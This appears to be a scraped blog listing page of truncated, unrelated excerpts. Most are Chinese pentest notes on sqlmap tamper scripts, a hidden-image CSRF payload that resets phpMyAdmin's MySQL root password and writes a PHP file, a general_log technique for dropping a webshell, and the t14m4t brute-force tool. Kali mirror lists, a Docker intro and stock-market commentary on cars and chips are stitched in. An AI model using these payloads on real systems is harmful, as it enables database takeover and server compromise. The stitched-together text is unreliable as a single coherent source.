0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下，方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我，着能偷偷说一下多做一些收集对吸收知识很快。 0x01 start 脚本名：apostrophemask.py 作用：用utf8代替引号 Example: (“1 AND ‘1’=’1”) ‘1 AND %EF%BC%871%EF%BC%87=%EF%BC%871’ Tested against: all 脚本名：equaltolike.py 作用：like ...

修改root密码： 保存为：webshell.html <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" /> 密码为：www.webshell.cc 写文件 首先你要知道路径 保存为：webshell.html   <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=select%20'<?php%20phpinfo();?>'%20into%20outfile%20'/var/www/html/test.php...

三个sql语句拿下phpmyadmin的shell 首先要知道路径 一句一句的执行 ——————————————————— set global general_log=’on’; ——————————————————— SET global general_log_file=’D:/webshell/www/cmd.php’; ————————&#...

一、更新 #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #浙大 deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #清华大学 deb http://mirrors.tun...

####what is docker Docker是一个开源的引擎，可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署，包括VMs（虚拟机）、bare metal、OpenStack 集群和其他的基础应用平台。 #####Docker通常用于如下场景： web应用的自动化打包和发布；（我后面就会用到这个功能了额…） 自动化测试和持续集成、发布； 在服务型环境中部署和调整数据库或其他的后台应用； #####一些名词解释 image：镜像，是指将应用打包之后的存储方式，一个image包含多层layer，每...

t14m4t t14m4t是一款功能强大的自动化暴力破解工具，并且封装了 THC-Hydra 和 Nmap安全扫描器 。t14m4t可以扫描用户定义的目标主机或包含目标地址的文件列表，以搜索t14m4t支持的服务开放端口，并且能够使用最常见的弱凭证来对发现的服务开放端口进行暴力破解攻击。 工具安装 t14m4t的安装过程包括将项目代码克隆至本地，并将t14m4t封装成可执行文件。除此之外，还需要安装好 THC-Hydra 和 Nmap安全扫描器 。 安装命令如下： # git clone https://github.com/MS-WEB-BN/t14m4t/ # cd t14m4t # sudo chmod +x t14m4t Nmap是一个网络连接...

<?php echo gethostbyname($_SERVER['HTTP_HOST']); ?>  

像正常使用Python一样，去使用PentestBox里的Python python -m pip install 模块名 -m ： 模块的方式 pip ： （管道），python内置的模块管理工具

汽车今天出了新事件，景气度预期将再次提升。 最新数据显示，7月第二周汽车销量再超预期。7月第二周乘用车上险38.3万辆，环比第一周增长12.3%，较上月同期增长6.4%，较2021年、2022年同期分别增长2%和1%。其中新能源车销量13.8万辆，同环比分别为45.7%/ 16.1%，继续增长。 之前市场担心因购置税减免以及疫情延后消费等因素导致2022年6、7月基数较高，今年汽车销量同比可能会下滑，但最新的7月第二周数据显示，在去年高基数下再次增长，超出市场预期。超预期的部分主要来自换车需求。2016年-2017年是近10年最高销量的年份，销量比最近...

芯片产业链当前需要关注的一是国产替代，二是库存周期。国产替代影响弹性，而库存周期决定方向。 库存周期属性强的主要是芯片设计环节，芯片设计包括存储、MCU、SoC、射频芯片、模拟芯片等等细分分支，受AI驱动的创新周期以及国产替代周期影响之外，行业整体存在明显的库存周期，一般完整周期大致为4年。下半年可以预期需求相对有一定复苏，预计库存周期底部有望在2023年二季度至三季度到来。具体来看，存储等供给端逻辑较好的板块复苏进度相对较快。最常见的DRAM产品DDR4 16Gb现货价格在4月11日上涨0.78%，成为自2022年3月7日以来的首...